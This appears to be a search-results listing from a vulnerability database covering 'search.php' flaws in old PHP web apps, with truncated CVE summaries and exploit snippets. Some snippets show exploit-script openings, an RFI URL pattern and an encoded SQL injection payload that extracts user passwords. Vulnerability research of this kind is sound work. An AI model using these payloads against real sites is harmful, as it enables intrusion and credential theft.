1673 matches found
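Woltlab Burning Board Search.PHP SQL Injection Vulnerability
Woltlab Burning Board is a PHP-based web application. Woltlab Burning Board does not properly filter user-supplied input, so a remote attacker can exploit the vulnerability to carry out SQL injection attacks and obtain sensitive information. The problem is that the 'Search.PHP' script lacks filtering of user-supplied web parameters; submitting malicious script code as parameter data can lead to disclosure of sensitive information. Woltlab Woltlab Burning Board Lite 1.0.2 WoltLab Burning Board Lite 1.0.2 WoltLab Burning Board Lite 1.0.1 e WoltLab Burning Board Lite...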
Burning Board search.php boardids Parameter SQL Injection
Binary data 3888.prm...
Woltlab Burning Board 1.0.2/2.3.6 - search.php SQL Injection (2)
Woltlab Burning Board 1.0.2/2.3.6 - search.php SQL Injection 2 !/usr/bin/perl Woltlab Burning Board 2.X/Lite search.php SQL Injection exploit - burned.pl written by trew should work on every wbb regardless of php settings. v 1.2 - added 1337 sql filter evasion, version identification,better...
vulnerability script indexu all versions
vulnerability script indexu all versions Found by :SwEET-DeViL & viP HaCkEr & HaCkEr sUn TeaM AL-GaRNi Application : indexu version : all versions URL : http://www.nicecoder.com/ google : "Powered by INDEXU 5." Exploits : |//1| in upgrade.php...
Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (2)
!/usr/bin/perl Woltlab Burning Board 2.X/Lite search.php SQL Injection exploit - burned.pl written by trew should work on every wbb regardless of php settings. v 1.2 - added 1337 sql filter evasion, version identification,better regex,raw cookie v 1.1 - added wbblite support thx to lama !PRIVATE!...
Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (1)
?php / http://www.undergroundagents.de coded by silent vapor [email protected] / printr' -------------------------------------------------------------------------------- Woltlab Burning Board Lite = 1.0.2 GetHashes over search.php Woltlab Burning Board = 2.3.6 GetHashes over search.p...
Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (3)
!/usr/bin/perl use LWP::UserAgent; use HTTP::Response; $| = 1; print " Woltlab Burning Board 2.3.6 Bug by trew \n"; if$ARGV Exploiting...\n"; my $url = shift; my $id = shift; my $sstring = shift; my $ua = LWP::UserAgent-new; my $request = new HTTP::Request'POST', 'http://'.$url.'search.php';...
fcCMS10-xss.txt
Fix & Chips CMS v1.0 http://software.fixnchipsit.com/ Vulnerable files: staff.php delete-announce.php new-customer.php search.php client-results.php -------------------------------------------- staff.php XSS User input in the Announcement box isn't properly sanatized before being generated. A few...
Cross site scripting
Multiple cross-site scripting (XSS) vulnerabilities in Fix and Chips CMS 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter in (a) delete-announce.php; the (2) Announcement form field in (b) staff.php; the (3) Client Name, (4) Business Name, (5) Street, (6) Address 2, (7)...
CVE-2007-0146
Multiple cross-site scripting (XSS) vulnerabilities in Fix and Chips CMS 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter in (a) delete-announce.php; the (2) Announcement form field in (b) staff.php; the (3) Client Name, (4) Business Name, (5) Street, (6) Address 2, (7)...
CVE-2006-4575
Multiple SQL injection vulnerabilities in The Address Book 1.04e allow remote attackers to execute arbitrary SQL commands via the (1) lastname, (2) firstname, (3) passwordOld, (4) passwordNew, (5) id, (6) language, (7) defaultLetter, (8) newuserPass, (9) newuserType, (10) newuserEmail parameters in (a) user.php; the (1)...
CVE-2006-4577
CVE-2006-4577 affects The Address Book 1.04e. It contains multiple cross-site scripting (XSS) vulnerabilities allowing an attacker to inject arbitrary scripts via: (1) email, (2) websites, (3) groupAddName in save.php; (4) errorMsg in index.php; (5) goTo and (6) search in search.php. CVSS v2 base...
CVE-2006-4577
Multiple cross-site scripting (XSS) vulnerabilities in The Address Book 1.04e allow remote attackers to inject arbitrary web script or HTML via Javascript events in the (1) email, (2) websites, and (3) groupAddName parameters in (a) save.php; the (4) errorMsg parameter in (b) index.php; and the (5) goTo and (6)...
awrate.com Message Board 1.0 - 'search.php' Remote File Inclusion
!/usr/bin/perl Portal Name : awrate 1.0search.php Remote File Inclusion Exploit BUG: http://target/Path/search.php?toroot=http Vulnerable Code: includeonce"$toroot../commonphp/table.php.inc";; Bug Found DeltahackingTEAM Code :Dr.Trojan&Dr.Pantagon Download...
awrate.com Message Board 1.0 - search.php Remote File Inclusion
awrate.com Message Board 1.0 - search.php Remote File Inclusion !/usr/bin/perl Portal Name : awrate 1.0search.php Remote File Inclusion Exploit BUG: http://target/Path/search.php?toroot=http Vulnerable Code: includeonce"$toroot../commonphp/table.php.inc";; Bug Found DeltahackingTEAM Code...
CVE-2006-5236
SQL injection vulnerability in search.php in 4images 1.7.x allows remote authenticated users to execute arbitrary SQL commands via the search_user parameter...
CVE-2006-5236
CVE-2006-5236 is an SQL injection in 4images 1.7.x, exploitable via the search_user parameter in search.php. The vulnerability allows remote authenticated users to execute arbitrary SQL commands through that parameter. A PT-Security advisory for 4Images confirms affected versions (1.7.x) and reco...
4Images 1.7.x - 'search.php' SQL Injection
!/usr/bin/php //search.php?searchuser=x%2527%20union%20select%20userpassword%20from%204imagesusers%20where%20username=%2527ADMIN w4ck1ng - w4ck1ng.com / if!$argv3 die"Usage: php $argv0 host path options table prefix user id\n Options: -d: Determine table prefix\n Example: php $argv0 domain.com...